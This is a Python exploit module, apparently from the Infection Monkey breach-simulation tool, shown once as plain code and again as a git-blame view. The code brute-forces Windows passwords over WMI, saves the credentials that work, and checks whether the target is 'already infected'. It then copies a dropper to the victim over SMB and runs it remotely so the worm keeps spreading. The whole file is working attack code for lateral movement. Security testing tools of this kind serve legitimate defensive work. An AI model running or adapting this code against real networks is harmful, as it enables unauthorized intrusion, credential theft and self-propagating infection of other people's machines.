monkey/chaos_monkey/exploit/wmiexec.py

import socket
import ntpath
import logging
import traceback
from tools import build_monkey_commandline
from model import DROPPER_CMDLINE, MONKEY_CMDLINE
from model.host import VictimHost
from exploit import HostExploiter
from exploit.tools import SmbTools, WmiTools, AccessDeniedException, get_target_monkey, report_failed_login
from impacket.dcerpc.v5.rpcrt import DCERPCException

LOG = logging.getLogger(__name__)


class WmiExploiter(HostExploiter):
    _target_os_type = ['windows']

    def __init__(self):
        self._config = __import__('config').WormConfiguration
        self._guid = __import__('config').GUID

    @WmiTools.dcom_wrap
    def exploit_host(self, host, depth=-1, src_path=None):
        assert isinstance(host, VictimHost)

        src_path = src_path or get_target_monkey(host)

        if not src_path:
            LOG.info("Can't find suitable monkey executable for host %r", host)
            return False

        passwords = list(self._config.psexec_passwords[:])
        known_password = host.get_credentials(self._config.psexec_user)
        if known_password is not None:
            if known_password in passwords:
                passwords.remove(known_password)
            passwords.insert(0, known_password)

        for password in passwords:
            LOG.debug("Attempting to connect %r using WMI with password '%s'",
                      host, password)

            wmi_connection = WmiTools.WmiConnection()

            try:
                wmi_connection.connect(host,
                                       self._config.psexec_user,
                                       password)
            except AccessDeniedException:
                LOG.debug("Failed connecting to %r using WMI with password '%s'",
                          host, password)
                continue
            except DCERPCException, exc:
                report_failed_login(self, host, self._config.psexec_user, password)
                LOG.debug("Failed connecting to %r using WMI with password '%s'",
                          host, password)
                continue
            except socket.error, exc:
                LOG.debug("Network error in WMI connection to %r with password '%s' (%s)",
                          host, password, exc)
                return False
            except Exception, exc:
                LOG.debug("Unknown WMI connection error to %r with password '%s' (%s):\n%s",
                          host, password, exc, traceback.format_exc())
                return False

            host.learn_credentials(self._config.psexec_user, password)

            # query process list and check if monkey already running on victim
            process_list = WmiTools.list_object(wmi_connection, "Win32_Process",
                                                fields=("Caption", ),
                                                where="Name='%s'" % ntpath.split(src_path)[-1])
            if process_list:
                wmi_connection.close()

                LOG.debug("Skipping %r - already infected", host)
                return False

            # copy the file remotely using SMB
            remote_full_path = SmbTools.copy_file(host,
                                                  self._config.psexec_user,
                                                  password,
                                                  src_path,
                                                  self._config.dropper_target_path)

            if not remote_full_path:
                wmi_connection.close()
                return False
            # execute the remote dropper in case the path isn't final
            elif remote_full_path.lower() != self._config.dropper_target_path.lower():
                cmdline = DROPPER_CMDLINE % {'dropper_path': remote_full_path}
            else:
                cmdline = MONKEY_CMDLINE % {'monkey_path': remote_full_path}

            cmdline += build_monkey_commandline(host, depth - 1)

            # execute the remote monkey
            result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,
                                                                                 ntpath.split(remote_full_path)[0],
                                                                                 None)

            if (0 != result.ProcessId) and (0 == result.ReturnValue):
                LOG.info("Executed dropper '%s' on remote victim %r (pid=%d, exit_code=%d, cmdline=%r)",
                         remote_full_path, host, result.ProcessId, result.ReturnValue, cmdline)
                success = True
            else:
                LOG.debug("Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, cmdline=%r)",
                          remote_full_path, host, result.ProcessId, result.ReturnValue, cmdline)
                success = False

            result.RemRelease()
            wmi_connection.close()

            return success

        return False
first commit 2015-08-30 15:27:35 +08:00			`import socket`
			`import ntpath`
			`import logging`
			`import traceback`
merge duplicate code 2016-07-26 23:52:58 +08:00			`from tools import build_monkey_commandline`
code organization #2 2015-11-30 20:11:19 +08:00			`from model import DROPPER_CMDLINE, MONKEY_CMDLINE`
			`from model.host import VictimHost`
			`from exploit import HostExploiter`
Added functionality to report all brute force password attempts even if unsuccessful. 2016-08-09 05:23:18 +08:00			`from exploit.tools import SmbTools, WmiTools, AccessDeniedException, get_target_monkey, report_failed_login`
			`from impacket.dcerpc.v5.rpcrt import DCERPCException`
first commit 2015-08-30 15:27:35 +08:00
			`LOG = logging.getLogger(__name__)`

code organization 2015-11-30 16:56:20 +08:00
first commit 2015-08-30 15:27:35 +08:00			`class WmiExploiter(HostExploiter):`
- c&c - support for virtual files (monkeyfs) - ssh exploitation - some linux support issues fixed 2015-09-29 22:58:06 +08:00			`_target_os_type = ['windows']`

first commit 2015-08-30 15:27:35 +08:00			`def __init__(self):`
			`self._config = __import__('config').WormConfiguration`
fixes and improvements after test-run 1 2016-07-20 05:53:41 +08:00			`self._guid = __import__('config').GUID`
first commit 2015-08-30 15:27:35 +08:00
			`@WmiTools.dcom_wrap`
GC-4599: added depth parameter 2015-12-08 01:08:15 +08:00			`def exploit_host(self, host, depth=-1, src_path=None):`
first commit 2015-08-30 15:27:35 +08:00			`assert isinstance(host, VictimHost)`

- c&c - support for virtual files (monkeyfs) - ssh exploitation - some linux support issues fixed 2015-09-29 22:58:06 +08:00			`src_path = src_path or get_target_monkey(host)`

			`if not src_path:`
			`LOG.info("Can't find suitable monkey executable for host %r", host)`
			`return False`

first commit 2015-08-30 15:27:35 +08:00			`passwords = list(self._config.psexec_passwords[:])`
			`known_password = host.get_credentials(self._config.psexec_user)`
			`if known_password is not None:`
			`if known_password in passwords:`
			`passwords.remove(known_password)`
			`passwords.insert(0, known_password)`

			`for password in passwords:`
			`LOG.debug("Attempting to connect %r using WMI with password '%s'",`
			`host, password)`

			`wmi_connection = WmiTools.WmiConnection()`

			`try:`
			`wmi_connection.connect(host,`
			`self._config.psexec_user,`
			`password)`
			`except AccessDeniedException:`
			`LOG.debug("Failed connecting to %r using WMI with password '%s'",`
			`host, password)`
			`continue`
Added functionality to report all brute force password attempts even if unsuccessful. 2016-08-09 05:23:18 +08:00			`except DCERPCException, exc:`
			`report_failed_login(self, host, self._config.psexec_user, password)`
			`LOG.debug("Failed connecting to %r using WMI with password '%s'",`
			`host, password)`
			`continue`
first commit 2015-08-30 15:27:35 +08:00			`except socket.error, exc:`
			`LOG.debug("Network error in WMI connection to %r with password '%s' (%s)",`
			`host, password, exc)`
			`return False`
			`except Exception, exc:`
			`LOG.debug("Unknown WMI connection error to %r with password '%s' (%s):\n%s",`
			`host, password, exc, traceback.format_exc())`
			`return False`

			`host.learn_credentials(self._config.psexec_user, password)`

			`# query process list and check if monkey already running on victim`
			`process_list = WmiTools.list_object(wmi_connection, "Win32_Process",`
			`fields=("Caption", ),`
			`where="Name='%s'" % ntpath.split(src_path)[-1])`
			`if process_list:`
			`wmi_connection.close()`

			`LOG.debug("Skipping %r - already infected", host)`
			`return False`

code organization 2015-11-30 16:56:20 +08:00			`# copy the file remotely using SMB`
first commit 2015-08-30 15:27:35 +08:00			`remote_full_path = SmbTools.copy_file(host,`
			`self._config.psexec_user,`
			`password,`
			`src_path,`
			`self._config.dropper_target_path)`

- rdp exploitation - http file transfer - ftp server code for future support 2015-09-07 15:25:25 +08:00			`if not remote_full_path:`
code organization 2015-11-30 16:56:20 +08:00			`wmi_connection.close()`
			`return False`
first commit 2015-08-30 15:27:35 +08:00			`# execute the remote dropper in case the path isn't final`
- rdp exploitation - http file transfer - ftp server code for future support 2015-09-07 15:25:25 +08:00			`elif remote_full_path.lower() != self._config.dropper_target_path.lower():`
first commit 2015-08-30 15:27:35 +08:00			`cmdline = DROPPER_CMDLINE % {'dropper_path': remote_full_path}`
			`else:`
			`cmdline = MONKEY_CMDLINE % {'monkey_path': remote_full_path}`

merge duplicate code 2016-07-26 23:52:58 +08:00			`cmdline += build_monkey_commandline(host, depth - 1)`
added default tunnel is the exploiter added self delete on cleanup fixed argument parsing 2015-10-14 22:22:05 +08:00
first commit 2015-08-30 15:27:35 +08:00			`# execute the remote monkey`
			`result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,`
			`ntpath.split(remote_full_path)[0],`
			`None)`

			`if (0 != result.ProcessId) and (0 == result.ReturnValue):`
			`LOG.info("Executed dropper '%s' on remote victim %r (pid=%d, exit_code=%d, cmdline=%r)",`
			`remote_full_path, host, result.ProcessId, result.ReturnValue, cmdline)`
			`success = True`
			`else:`
			`LOG.debug("Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, cmdline=%r)",`
			`remote_full_path, host, result.ProcessId, result.ReturnValue, cmdline)`
			`success = False`

			`result.RemRelease()`
			`wmi_connection.close()`

			`return success`

			`return False`